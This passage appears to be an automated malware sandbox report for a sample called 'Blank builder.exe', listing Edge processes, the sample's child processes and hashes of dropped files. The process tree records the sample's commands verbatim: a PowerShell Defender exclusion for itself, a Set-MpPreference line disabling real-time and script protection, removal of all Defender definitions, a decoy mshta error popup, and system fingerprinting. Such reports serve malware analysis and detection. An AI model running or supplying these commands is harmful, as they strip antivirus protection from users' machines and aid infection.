                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1720,3821045607182031178,7496062817446756110,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6092 /prefetch:1
                                                                                                                    2⤵
                                                                                                                      PID:2960
                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1720,3821045607182031178,7496062817446756110,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8880 /prefetch:1
                                                                                                                      2⤵
                                                                                                                        PID:1108
                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1720,3821045607182031178,7496062817446756110,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=64 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5576 /prefetch:1
                                                                                                                        2⤵
                                                                                                                          PID:4664
                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1720,3821045607182031178,7496062817446756110,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9672 /prefetch:1
                                                                                                                          2⤵
                                                                                                                            PID:904
                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1720,3821045607182031178,7496062817446756110,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=66 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9844 /prefetch:1
                                                                                                                            2⤵
                                                                                                                              PID:5220
                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1720,3821045607182031178,7496062817446756110,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=67 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10144 /prefetch:1
                                                                                                                              2⤵
                                                                                                                                PID:5260
                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1720,3821045607182031178,7496062817446756110,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=68 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10296 /prefetch:1
                                                                                                                                2⤵
                                                                                                                                  PID:5524
                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1720,3821045607182031178,7496062817446756110,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=70 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9292 /prefetch:1
                                                                                                                                  2⤵
                                                                                                                                    PID:3972
                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1720,3821045607182031178,7496062817446756110,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=71 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9972 /prefetch:1
                                                                                                                                    2⤵
                                                                                                                                      PID:5572
                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1720,3821045607182031178,7496062817446756110,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=72 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10548 /prefetch:1
                                                                                                                                      2⤵
                                                                                                                                        PID:5804
                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1720,3821045607182031178,7496062817446756110,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=73 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9712 /prefetch:1
                                                                                                                                        2⤵
                                                                                                                                          PID:1008
                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1720,3821045607182031178,7496062817446756110,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=74 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10972 /prefetch:1
                                                                                                                                          2⤵
                                                                                                                                            PID:6032
                                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1720,3821045607182031178,7496062817446756110,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=6452 /prefetch:2
                                                                                                                                            2⤵
                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                            PID:5620
                                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1720,3821045607182031178,7496062817446756110,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=77 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10300 /prefetch:1
                                                                                                                                            2⤵
                                                                                                                                              PID:796
                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1720,3821045607182031178,7496062817446756110,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6696 /prefetch:8
                                                                                                                                              2⤵
                                                                                                                                              • NTFS ADS
                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                              PID:4704
                                                                                                                                          • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                            C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                            1⤵
                                                                                                                                              PID:4076
                                                                                                                                            • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                              C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                              1⤵
                                                                                                                                                PID:4580
                                                                                                                                              • C:\Windows\System32\rundll32.exe
                                                                                                                                                C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                                                                                1⤵
                                                                                                                                                  PID:4684
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\Temp1_Blank Builder.zip\Blank builder.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\Temp1_Blank Builder.zip\Blank builder.exe"
                                                                                                                                                  1⤵
                                                                                                                                                    PID:1472
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp1_Blank Builder.zip\Blank builder.exe
                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\Temp1_Blank Builder.zip\Blank builder.exe"
                                                                                                                                                      2⤵
                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                      PID:1148
                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Temp1_Blank Builder.zip\Blank builder.exe'"
                                                                                                                                                        3⤵
                                                                                                                                                          PID:3508
                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Temp1_Blank Builder.zip\Blank builder.exe'
                                                                                                                                                            4⤵
                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                            PID:3176
                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                          C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                                                                                                                                          3⤵
                                                                                                                                                            PID:4628
                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                              powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                                                                                                                                              4⤵
                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                              PID:3832
                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                            C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('An error occurred, please try again later', 0, 'Error', 48+16);close()""
                                                                                                                                                            3⤵
                                                                                                                                                              PID:3544
                                                                                                                                                              • C:\Windows\system32\mshta.exe
                                                                                                                                                                mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('An error occurred, please try again later', 0, 'Error', 48+16);close()"
                                                                                                                                                                4⤵
                                                                                                                                                                  PID:2376
                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                3⤵
                                                                                                                                                                  PID:3812
                                                                                                                                                                  • C:\Windows\system32\tasklist.exe
                                                                                                                                                                    tasklist /FO LIST
                                                                                                                                                                    4⤵
                                                                                                                                                                    • Enumerates processes with tasklist
                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                    PID:3900
                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                  C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                                                                                                  3⤵
                                                                                                                                                                    PID:3204
                                                                                                                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                      wmic csproduct get uuid
                                                                                                                                                                      4⤵
                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                      PID:6028
                                                                                                                                                              • C:\Users\Admin\Downloads\Blank builder.exe
                                                                                                                                                                "C:\Users\Admin\Downloads\Blank builder.exe"
                                                                                                                                                                1⤵
                                                                                                                                                                  PID:4276
                                                                                                                                                                  • C:\Users\Admin\Downloads\Blank builder.exe
                                                                                                                                                                    "C:\Users\Admin\Downloads\Blank builder.exe"
                                                                                                                                                                    2⤵
                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                    PID:4248
                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                      C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\Blank builder.exe'"
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:1040
                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\Blank builder.exe'
                                                                                                                                                                          4⤵
                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                          PID:5540
                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                                                                                                                                                        3⤵
                                                                                                                                                                          PID:1148
                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                            powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                                                                                                                                                            4⤵
                                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                            PID:5008
                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                          C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('An error occurred, please try again later', 0, 'Error', 48+16);close()""
                                                                                                                                                                          3⤵
                                                                                                                                                                            PID:1400
                                                                                                                                                                            • C:\Windows\system32\mshta.exe
                                                                                                                                                                              mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('An error occurred, please try again later', 0, 'Error', 48+16);close()"
                                                                                                                                                                              4⤵
                                                                                                                                                                                PID:4620
                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                              C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                              3⤵
                                                                                                                                                                                PID:3832
                                                                                                                                                                                • C:\Windows\system32\tasklist.exe
                                                                                                                                                                                  tasklist /FO LIST
                                                                                                                                                                                  4⤵
                                                                                                                                                                                  • Enumerates processes with tasklist
                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                  PID:3172
                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                                                                                                                3⤵
                                                                                                                                                                                  PID:2236
                                                                                                                                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                    wmic csproduct get uuid
                                                                                                                                                                                    4⤵
                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                    PID:3204

                                                                                                                                                                            Network

                                                                                                                                                                            MITRE ATT&CK Enterprise v15

                                                                                                                                                                            Replay Monitor

                                                                                                                                                                            Loading Replay Monitor...

                                                                                                                                                                            Downloads

                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                              Filesize

                                                                                                                                                                              152B

                                                                                                                                                                              MD5

                                                                                                                                                                              ec7568123e3bee98a389e115698dffeb

                                                                                                                                                                              SHA1

                                                                                                                                                                              1542627dbcbaf7d93fcadb771191f18c2248238c

                                                                                                                                                                              SHA256

                                                                                                                                                                              5b5e61fe004e83477411dd2b6194e90591d36f2f145cc3b4faa20cf7ae266a75

                                                                                                                                                                              SHA512

                                                                                                                                                                              4a53fbbd7281a1a391f0040f6ff5515cedf6e1f97f2dae4ab495b4f76eb4f929dcda6b347f9bf7f66a899330f8897e1ed117314945d1de27b035cc170fa447d3

                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000001

                                                                                                                                                                              Filesize

                                                                                                                                                                              66KB

                                                                                                                                                                              MD5

                                                                                                                                                                              111fa5860342b932e486bc977d0ca730

                                                                                                                                                                              SHA1

                                                                                                                                                                              ca6d903232979a8f0cce7eb1793492b082a42937

                                                                                                                                                                              SHA256

                                                                                                                                                                              9633b1d9ef15aa27f0d44c5f0453dd9544db253683679d8349985ecaab9f5be9

                                                                                                                                                                              SHA512

                                                                                                                                                                              0dcff878f968a1c9fc0b0a0afaeeb39e9b3aece3cb544f3c26b1cf88e8b6c8cb8d2d5d6071d5f0a3330d412375a018a76aeb23eb5acb8da93edd548fa642e7f0

                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000002

                                                                                                                                                                              Filesize

                                                                                                                                                                              85KB

                                                                                                                                                                              MD5

                                                                                                                                                                              1d1c30a80db31d5663583d0dd2ece972

                                                                                                                                                                              SHA1

                                                                                                                                                                              6be259a1fea8739cbc93f1484f3a496a6ece880c

                                                                                                                                                                              SHA256

                                                                                                                                                                              fa8ae31e53c17ed3e66a747cd3dcd531a74569e09863081873a2cc0a39748951

                                                                                                                                                                              SHA512

                                                                                                                                                                              0f748027d3e998ada49e1da9ad2ee6cc0d70198782f953bef3e053ea6d3dcc500feab769a856b0017348965fb1378b050b9c31447a5551c01a145f18f5c20e69

                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000003

                                                                                                                                                                              Filesize

                                                                                                                                                                              41KB

                                                                                                                                                                              MD5

                                                                                                                                                                              85b25de5db6be9e7efee645bce159f26

                                                                                                                                                                              SHA1

                                                                                                                                                                              d371d74fc84ea2dc2d8deb430ae91383843f07ca

                                                                                                                                                                              SHA256

                                                                                                                                                                              c289e028ff1728228ac3d241afb2b50b3a948a91c56b848bc3467cb7d8f248ae

                                                                                                                                                                              SHA512

                                                                                                                                                                              582a0e33388bd75217c0a737599750c0a7e24629df23016a10e94948884af72a71d13962c661b7c903a0377739a3cd05974b7cb0072439e46467eaf2d999fec2

                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000004

                                                                                                                                                                              Filesize

                                                                                                                                                                              97KB

                                                                                                                                                                              MD5

                                                                                                                                                                              3fa73bdf80da8c6eb9a096ccd3c96c39

                                                                                                                                                                              SHA1

                                                                                                                                                                              676e2c943eac5daea74c9d1107ca95f4485b0e31

                                                                                                                                                                              SHA256

                                                                                                                                                                              feee0a46e8a5dbe2faa4d134c9011aea062f491a306f1fac4b9ffca0bafe6fd8

                                                                                                                                                                              SHA512

                                                                                                                                                                              ac4c82b9cc28c75c58a0e72d649b49afd534d7e70faee9d63b67aebfc188fa7fdf51c62e3c5975a038f5de6115311f21f6391ee72d684d8b415310ecd150ec1b

                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000005

                                                                                                                                                                              Filesize

                                                                                                                                                                              21KB

                                                                                                                                                                              MD5

                                                                                                                                                                              660c3b546f2a131de50b69b91f26c636

                                                                                                                                                                              SHA1

                                                                                                                                                                              70f80e7f10e1dd9180efe191ce92d28296ec9035

                                                                                                                                                                              SHA256

                                                                                                                                                                              fd91362b7111a0dcc85ef6bd9bc776881c7428f8631d5a32725711dce678bff9

                                                                                                                                                                              SHA512

                                                                                                                                                                              6be1e881fbb4a112440883aecb232c1afc28d0f247276ef3285b17b925ea0a5d3bac8eac6db906fc6ac64a4192dd740f5743ba62ba36d8204ff3e8669b123db2

                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000006

                                                                                                                                                                              Filesize

                                                                                                                                                                              17KB

                                                                                                                                                                              MD5

                                                                                                                                                                              915f72dca75b2ac4f4cd0104d44688e0

                                                                                                                                                                              SHA1

                                                                                                                                                                              8b5f29921194208eb5c9d393801dae12126e3d22

                                                                                                                                                                              SHA256

                                                                                                                                                                              1c652a0366fa42ee1848e15409c78070c45fb3d5175769abb3d34ecd7352c75f

                                                                                                                                                                              SHA512

                                                                                                                                                                              f165f510a892f71e90bb71c98fd1f28d6583fca2227f581bdf04e5a6c6547445dbdacb07555b8dd7bab2a38f86046da8df299dba0c374cc0d6925b25805330be

                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000007

                                                                                                                                                                              Filesize

                                                                                                                                                                              20KB

                                                                                                                                                                              MD5

                                                                                                                                                                              87e8230a9ca3f0c5ccfa56f70276e2f2

                                                                                                                                                                              SHA1

                                                                                                                                                                              eb116c8fd20cb2f85b7a942c7dae3b0ed6d27fe7

                                                                                                                                                                              SHA256

                                                                                                                                                                              e18d7214e7d3d47d913c0436f5308b9296ca3c6cd34059bf9cbf03126bafafe9

                                                                                                                                                                              SHA512

                                                                                                                                                                              37690a81a9e48b157298080746aa94289a4c721c762b826329e70b41ba475bb0261d048f9ab8e7301e43305c5ebf53246c20da8cd001130bf156e8b3bd38b9b8

                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000009

                                                                                                                                                                              Filesize

                                                                                                                                                                              36KB

                                                                                                                                                                              MD5

                                                                                                                                                                              06f8e0147a794e1c167f68baa7596d07

                                                                                                                                                                              SHA1

                                                                                                                                                                              5fa951973951749dfc1677610d9192503c30a880

                                                                                                                                                                              SHA256

                                                                                                                                                                              9481eaac9df851cca12efbd00e8d98f320f2a3f97242bba9a7e5ad8fdfff882c

                                                                                                                                                                              SHA512

                                                                                                                                                                              3266121b81263882ff692f3ea48ee957e2ef2e02047d0151df87eb5a357282038e6a9f2a23ce4d07506744c7bc9d04a5e7bc75ee9127023a37f0b42cbde3e948

                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000a

                                                                                                                                                                              Filesize

                                                                                                                                                                              71KB

                                                                                                                                                                              MD5

                                                                                                                                                                              db0f9b1c1ca2dcf1037adbf33f3b2ce1

                                                                                                                                                                              SHA1

                                                                                                                                                                              0a7df131f215ba0d0d6e6d16f43e56177a49e193

                                                                                                                                                                              SHA256

                                                                                                                                                                              796b1127ddbbecd61d04f9aca18792347dec6a45859dd5fee85b64b2b1144b0d

                                                                                                                                                                              SHA512

                                                                                                                                                                              432f5585697d31b1740b99d4dfcbc50f701a13f18b0ba7d32b8e71d7f76609b5e1680eb60e4a2d01998623c7b33c2c0bf5c0631ccccdc1dd23d214138c4329b7

                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000b

                                                                                                                                                                              Filesize

                                                                                                                                                                              72KB

                                                                                                                                                                              MD5

                                                                                                                                                                              5a414f2ec36fac32d26ae38e0536194a

                                                                                                                                                                              SHA1

                                                                                                                                                                              ee0a24e5ec940797217d46345114c11eaf62abaf

                                                                                                                                                                              SHA256

                                                                                                                                                                              9238659058fb6494dba9a25da81594f54b0ba45baeebf6ff5505d8a45441179c

                                                                                                                                                                              SHA512

                                                                                                                                                                              bb583c9393b7882864c47544ce9d4bf0c6a51b4ec6de6596623fd665f4d67dd0775cf0689eb9c54b11cf7b50324a13e13278441f4cff83a52dbdcaf8b136d8eb

                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00001b

                                                                                                                                                                              Filesize

                                                                                                                                                                              29KB

                                                                                                                                                                              MD5

                                                                                                                                                                              03537de739439cf392c7255c46bc5c8f

                                                                                                                                                                              SHA1

                                                                                                                                                                              972ba526af153f72eb707c86952e0c9f3e6418e8

                                                                                                                                                                              SHA256

                                                                                                                                                                              87deb3e06f5250e9db209d071705b23013fb3caa95a33effeb212be182b42f17

                                                                                                                                                                              SHA512

                                                                                                                                                                              916716437d29b25dd8cee2bf3588fff9703a49a0c4c33cdbefccea4f43876eac9a3512ef87825c5afacf2a29d4e874a9fae92454a4c4f009e8ad6ea4df5c5855

                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                                                                                                                              Filesize

                                                                                                                                                                              2KB

                                                                                                                                                                              MD5

                                                                                                                                                                              20415c5cf228827f0ffea969143eb33e

                                                                                                                                                                              SHA1

                                                                                                                                                                              202bd91c6ba720c685f80e60583c16cad902a081

                                                                                                                                                                              SHA256

                                                                                                                                                                              a048f2193a71a68eaa565570a6a0aa16c7782414d1f999d6750f7e9215d0d91b

                                                                                                                                                                              SHA512

                                                                                                                                                                              97635f59e7144c5c3bd189285fe2a4a2e82b3c2b57ffab34c02bd4303f77ea58e8738e03bf50008ba99a96d84aae25a954756b272c6b9b9848f8785e8ba680eb

                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                                                                                                                              Filesize

                                                                                                                                                                              1KB

                                                                                                                                                                              MD5

                                                                                                                                                                              cc1c0184c68da8a7a7fbd9dca8825715

                                                                                                                                                                              SHA1

                                                                                                                                                                              480cf90166c7b07db38c7c50c86a2f98cd03f497

                                                                                                                                                                              SHA256

                                                                                                                                                                              53a61dd56d14668b938124536652edc6318754b2133ea44b1e1361c0ea508d0f

                                                                                                                                                                              SHA512

                                                                                                                                                                              d6046d51adf06cfdf5f2915abfcdd9a8179e5c5420212c37d17fb3853d4602498eee3c60fe428bd9a3639318fe0309b62561f0e5ca1d2697eaf4eac42563f18e

                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                                                                                                                                                              Filesize

                                                                                                                                                                              111B

                                                                                                                                                                              MD5

                                                                                                                                                                              285252a2f6327d41eab203dc2f402c67

                                                                                                                                                                              SHA1

                                                                                                                                                                              acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6

                                                                                                                                                                              SHA256

                                                                                                                                                                              5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026

                                                                                                                                                                              SHA512

                                                                                                                                                                              11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                                                                                                                                                              Filesize

                                                                                                                                                                              11KB

                                                                                                                                                                              MD5

                                                                                                                                                                              82c86d9f4db0fac2372ac37933639c83

                                                                                                                                                                              SHA1

                                                                                                                                                                              a8a1adb24980290fd0e9ef7d56bc25a3d458c647

                                                                                                                                                                              SHA256

                                                                                                                                                                              3f5b0975bac111d7ef8ca769bac4cf9419de0fbb51edb8a973eff23ed4d86ba8

                                                                                                                                                                              SHA512

                                                                                                                                                                              83bcc4f687d39988784adaaa03c4d1a3d9f2abe9b40158bee84d752795c9d3a47152a5b156343439e1483f5f917b2d2c6f450f73680727d3c7491af762303d6b

                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                                                                                                                                                              Filesize

                                                                                                                                                                              9KB

                                                                                                                                                                              MD5

                                                                                                                                                                              661763b9e349084c1c3de1352eae6c0e

                                                                                                                                                                              SHA1

                                                                                                                                                                              eff4fd4150b73027c140519b6044784e8599e698

                                                                                                                                                                              SHA256

                                                                                                                                                                              5a08deaab9b6df1f58751926a0b90dd7660a49fd6d232b025e191887b1d04793

                                                                                                                                                                              SHA512

                                                                                                                                                                              73464888a6b1c24278e7df282364d97d71071488d3545689ddf6fcde2bd5602ba8482f1864dc662a038d707e3f7366199e7db6e1121387037b5721e477cb5121

                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                                                                                                                                                              Filesize

                                                                                                                                                                              11KB

                                                                                                                                                                              MD5

                                                                                                                                                                              fb285690b6127f7b09cc5002bf4255e0

                                                                                                                                                                              SHA1

